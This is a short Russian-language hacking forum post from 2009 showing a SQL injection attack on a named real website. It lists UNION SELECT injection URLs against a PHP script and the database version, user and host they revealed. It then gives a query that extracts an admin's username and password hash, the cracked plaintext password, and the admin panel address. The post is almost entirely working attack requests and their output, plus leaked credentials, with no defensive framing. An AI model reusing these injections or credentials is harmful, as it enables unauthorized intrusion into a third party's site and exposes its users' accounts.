15.02.2009, 13:46
|
|
Участник форума
Регистрация: 30.08.2008
Сообщений: 132
С нами:
9314306
Репутация:
325
|
|
upitup.com - PR5
Код:
http://www.upitup.com/roster/artist.php?aid=1000+UNION+SELECT+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8/*
DB_Ver:4.0.27-standard-log
DB_User:Sql18862@62.149.141.95
DB:Sql18862_1
Таблица с пользователями называется User, интересные поля id,email,username,password
Вытаскиваем одного из админов:
Код:
http://www.upitup.com/roster/artist.php?aid=1000+UNION+SELECT+1,AES_DECRYPT(AES_ENCRYPT(concat_ws(0x3a,username,password),73),73),3,4,5,6,7,8+from+users+limit+1,1/*
admin:3a21adafbcd3d31a17da15c670615005
или уже расшифрованные
admin : p161c4u
Чтобы попасть в админку логинимся и переходим:
Код:
http://www.upitup.com/controlcenter/
|
|
|